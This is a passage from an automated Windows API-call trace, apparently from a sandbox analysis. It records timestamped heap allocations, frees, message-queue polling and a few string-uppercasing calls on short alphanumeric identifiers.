hHeap=0x2af0000) returned 1 [0122.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0122.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0122.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0122.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0122.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0122.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7ba2) returned 0x2aaf410 [0122.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a140 | out: hHeap=0x2af0000) returned 1 [0122.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.614] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0122.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0122.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0122.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0122.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0122.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7ba2) returned 0x2a9a140 [0122.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a140 | out: hHeap=0x2af0000) returned 1 [0122.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0122.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.615] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0122.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0122.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0122.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0122.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0122.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0122.615] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0122.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0122.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0122.644] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0122.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0122.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0122.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0122.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0122.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0122.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0122.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0122.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7ba2) returned 0x2a9a140 [0122.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0122.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0122.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0122.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b18 [0122.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0122.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0122.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0122.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0122.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa210 [0122.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0122.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0122.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0122.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0122.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0122.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0122.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7ba2) returned 0x2ab6fc0 [0122.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0122.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0122.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0122.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0122.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0122.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0122.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0122.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0122.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0122.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0122.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0122.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0122.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0122.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0122.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0122.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0122.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0122.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0122.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0122.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0122.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0122.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0122.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0122.647] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0122.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0122.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0122.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0122.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0122.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0122.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0122.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0122.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0122.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0122.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0122.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0122.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0122.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0122.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0122.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0122.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0122.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0122.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0122.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0122.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0122.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.649] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0122.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0122.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0122.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0122.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0122.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0122.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0122.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0122.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0122.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0122.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0122.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0122.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0122.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0122.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0122.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0122.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0122.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0122.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0122.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0122.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0122.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0122.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0122.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0122.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0122.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0122.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0122.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0122.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0122.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.652] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0122.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0122.652] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0122.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0122.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0122.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9f58 [0122.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0122.652] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0122.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0122.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0122.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0122.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0122.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0122.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0122.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0122.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0122.652] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0122.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0122.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0122.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0122.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0122.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0122.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0122.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0122.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0122.653] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0122.653] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0122.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0122.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0122.653] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0122.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0122.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa2b8 [0122.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ae8 [0122.653] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 